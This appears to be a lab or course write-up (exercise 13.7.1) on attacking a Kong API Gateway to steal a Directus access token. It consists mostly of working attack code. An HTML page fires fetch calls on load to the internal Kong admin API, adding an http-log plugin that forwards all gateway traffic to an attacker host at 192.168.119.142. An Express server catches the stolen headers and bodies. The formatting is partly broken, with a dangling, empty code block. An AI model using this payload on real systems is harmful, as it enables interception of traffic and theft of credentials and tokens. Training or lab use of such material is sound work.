13.7.1

R3zk0n · October 2, 2025

API
Contents

    13.7.1

    The current reverse shell isn’t fully interactive and can cause the gateway to hang. Upgrade to a fully interactive shell.

    With the other plugins available in Kong API Gateway, find a way to log all traffic passing through the gateway. Inspect the traffic for any sensitive data. You should only need five to ten minutes worth of logging. The logging plugin can be disabled by sending a GET request to /plugins to get the plugin’s id, then sending a DELETE request to /plugins/{id}. Review the authentication documentation for Directus2 and use the logged data to gain access to a valid access token for Directus.

    Solution

    • Use PERL shell that is available on the microservice (Busybox)
    • Use payload to log for sensitive data
    <html>
<head>
<script>

function createService() {
    fetch("http://172.16.16.6:8001/services", {
      method: "post",
      headers: { "Content-Type": "application/json" },
      body: JSON.stringify({"name":"supersecret", "url": "http://127.0.0.1/"})
    }).then(function (route) {
      createRoute();
    });
}

function createRoute() {
    fetch("http://172.16.16.6:8001/services/supersecret/routes", { 
      method: "post",
      headers: { "Content-Type": "application/json" },
      body: JSON.stringify({"paths": ["/supersecret"]})
    }).then(function (plugin) {
      createPlugin();
    });  
}

function createPlugin() {
    fetch("http://172.16.16.6:8001/plugins", { 
      method: "post",
      headers: { "Content-Type": "application/json" },
      body: JSON.stringify({"name":"http-log", "config" :{"http_endpoint": "http://192.168.119.142:8000/callback"}})
    }).then(function (callback) {
      fetch("http://192.168.119.142/callback?setupComplete");
    });  
}
</script>
</head>
<body onload='createService()'>
<div></div>
</body>
</html>
    • Access to directus server using refresh token ```javascript
    
  + Node Server to receive incoming connections
```javascript
var express = require('express');
var app = express();
app.use(express.json());

app.post('/callback', function(req, res){
  console.log("=====================================");
  console.log("REQUEST HEADERS");
  console.log(req.headers);
  console.log("REQUEST BODY");
  console.log(req.body);
  console.log("=====================================");
  res.send('OK');
});

app.listen(8000);

    Twitter, Facebook